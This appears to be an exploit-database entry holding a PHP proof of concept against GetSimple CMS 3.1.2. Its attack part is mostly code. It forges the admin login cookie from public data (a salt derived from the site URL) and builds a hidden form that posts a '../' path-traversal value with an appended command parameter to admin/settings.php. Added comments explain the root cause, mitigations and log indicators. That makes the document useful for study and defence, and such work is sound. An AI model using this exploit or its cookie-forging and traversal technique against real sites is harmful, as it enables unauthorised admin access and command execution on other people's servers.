GetSimple 3.1.2 Code Execution



EKU-ID: 2944 CVE: OSVDB-ID:
Author: Jakub Galczyk Published: 2013-01-09 Verified: Verified


<?php
	// --------------------------------
	// iHaiHa-vs-hosting2rce.php	
	// --------------------------------
	// 26.12.2o12
	// 
	// Special thanks to ihaiha team for 
	// 'point of view'. 
	// 


// cookie() grepped from GetSimple 3.1.2, THANKS! ;]
// just for 'knowing the cookie'.
function create_cookie() {
	// Copy of GetSimple 3.1.2's cookie creation (per the comment above), kept
	// here only to show how the login cookie is built. All inputs come from
	// globals: $USR (admin username), $SALT, $cookie_time and $cookie_name.
	global $USR,$SALT,$cookie_time,$cookie_name; 
	// The cookie value is sha1(username . salt). No server-side random secret
	// and no per-session state enters the computation, so the value is fully
	// determined by $USR and $SALT. In getsimple_cookie() below, $SALT is
	// itself sha1($SITEURL), i.e. a hash of public data -- that is the root
	// cause this PoC relies on. Mitigation on the application side: derive
	// session tokens from random_bytes(), store them server-side and compare
	// with hash_equals().
	$saltUSR = $USR.$SALT;
	// The cookie *name* is likewise derived from public data (site name +
	// version), see $cookie_name in getsimple_cookie().
	$saltCOOKIE = sha1($cookie_name.$SALT);
	// Only path '/' is passed: no secure or httponly attribute is set on
	// either cookie.
	setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/');
	// Second cookie carries the admin username in plaintext.
	setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/');
}


// get-IT-simple-ihaiha-kod-yeah
function getsimple_cookie(){

	// Inputs the PoC assumes (Polish "potrzebujemy" = "we need"):
	// $authenticated is hard-coded to true, so the else branch below is dead.
	$authenticated = true;
	// Username is fixed to 'admin'; the commented-out $_POST['userid'] hints
	// it was meant to be request-driven.
	$USR = 'admin'; //$_POST['userid']; // admin?
	$ver_no_clean = '3.1.2';
	// Placeholder install path; the commented-out $_POST['siteurl'] again
	// hints at a request-driven value.
	$SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl'];
	// Salt is a hash of the (public) site URL, so it is deterministic and
	// reproducible by anyone who knows the URL -- this, not a key leak, is
	// what makes the cookie in create_cookie() computable offline.
	$SALT = sha1($SITEURL);
	// Note: a string, not an int. Unused in this function because the
	// create_cookie() call below is commented out; the setcookie() call
	// below uses a literal 3600 instead.
	$cookie_time = '7200';

	// Cookie name = lowercased site name + '_cookie_' + version, all public
	// data. The second strtolower() on an already-lowercased value is
	// redundant.
	$site_full_name = 'GetSimple';
	$name_url_clean = strtolower(str_replace(' ','-',$site_full_name));
	$cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean;

	// Everything below is written straight to the HTTP response as HTML.
	echo 'It should be interesting that we can (re)generate valid cookie<br>';
	echo 'and login without password, right? <br><br><b>Generated cookie:  ';
	echo $cookie_name . '<br></b>';
	echo '<br>Anyway: this simple code exploits vulnerability in :<br>';
	echo '<b>admin/settings.php</b>:';

	
	if( $authenticated ) {
                # YES - set the login cookie, then redirect user to secure panel 
//              create_cookie();
		// Only the plaintext-username cookie is actually set here (no
		// secure/httponly attributes); the hashed cookie above is not.
		setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/');
	
		// Hidden form posting back to the target's admin/settings.php.
		echo '<form method="post" action="'. $SITEURL .'">';
		echo '<input type="hidden" name="username" value="' . $USR . '">';
		echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass
		// The 'lang' value carries a '../' traversal out of the language
		// directory plus an appended '&cmd=' fragment. The page's claim is
		// that settings.php uses 'lang' in a file path without validating
		// it; the vulnerable application code is not shown here. The
		// application-side fix is to allow-list 'lang' against the installed
		// language files (e.g. basename() + existence check) instead of
		// trusting the posted value; defensively, a 'lang' parameter
		// containing '..' in requests to admin/settings.php is a clear
		// indicator in access logs.
		// PoC defect: $_POST['cmd'] is interpolated into an HTML attribute
		// unescaped and is undefined on a plain GET (notice in PHP < 8,
		// warning in PHP 8).
		echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">';
		echo '<br>So add come cmd: <br>';
		echo 'cmd: <input type="text" name="cmd">';
		echo '<input type="submit" value="teraz">'; // 'teraz' = Polish for 'now'
	} else {
		// Unreachable: $authenticated is always true above.
		echo 'Nope. :C';
	}



} // end of getsimple_cookie()

// Entry point: runs unconditionally on every request to this file, sets a
// cookie and writes the HTML above straight to the response.
getsimple_cookie();